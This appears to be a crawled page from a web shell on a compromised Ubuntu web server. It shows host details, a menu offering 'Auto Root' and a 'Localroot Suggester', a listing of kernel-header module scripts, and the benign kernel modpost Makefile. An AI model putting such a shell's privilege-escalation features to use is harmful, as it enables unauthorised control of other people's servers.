Linux jobworks 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64
Apache/2.4.58 (Ubuntu)
Server IP : 10.0.1.5 & Your IP : 216.73.217.52
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
linux-headers-6.8.0-124 /
scripts /
mod /
Delete
Unzip
Name
Size
Permission
Date
Action
.gitignore
99
B
-rw-r--r--
2024-03-10 20:38
Makefile
892
B
-rw-r--r--
2024-03-10 20:38
devicetable-offsets.c
7.72
KB
-rw-r--r--
2024-03-10 20:38
empty.c
54
B
-rw-r--r--
2024-03-10 20:38
file2alias.c
46.92
KB
-rw-r--r--
2026-05-26 09:55
list.h
5.88
KB
-rw-r--r--
2024-03-10 20:38
mk_elfconfig.c
1.24
KB
-rw-r--r--
2024-03-10 20:38
modpost.c
56.99
KB
-rw-r--r--
2026-05-26 09:55
modpost.h
5.76
KB
-rw-r--r--
2024-03-10 20:38
sumversion.c
9.45
KB
-rw-r--r--
2024-03-10 20:38
symsearch.c
5.76
KB
-rw-r--r--
2024-03-10 20:38
Save
Rename
# SPDX-License-Identifier: GPL-2.0 OBJECT_FILES_NON_STANDARD := y CFLAGS_REMOVE_empty.o += $(CC_FLAGS_LTO) hostprogs-always-y += modpost mk_elfconfig always-y += empty.o modpost-objs := modpost.o file2alias.o sumversion.o symsearch.o devicetable-offsets-file := devicetable-offsets.h $(obj)/$(devicetable-offsets-file): $(obj)/devicetable-offsets.s FORCE $(call filechk,offsets,__DEVICETABLE_OFFSETS_H__) targets += $(devicetable-offsets-file) devicetable-offsets.s # dependencies on generated files need to be listed explicitly $(obj)/modpost.o $(obj)/file2alias.o $(obj)/sumversion.o $(obj)/symsearch.o: $(obj)/elfconfig.h $(obj)/file2alias.o: $(obj)/$(devicetable-offsets-file) quiet_cmd_elfconfig = MKELF $@ cmd_elfconfig = $(obj)/mk_elfconfig < $< > $@ $(obj)/elfconfig.h: $(obj)/empty.o $(obj)/mk_elfconfig FORCE $(call if_changed,elfconfig) targets += elfconfig.h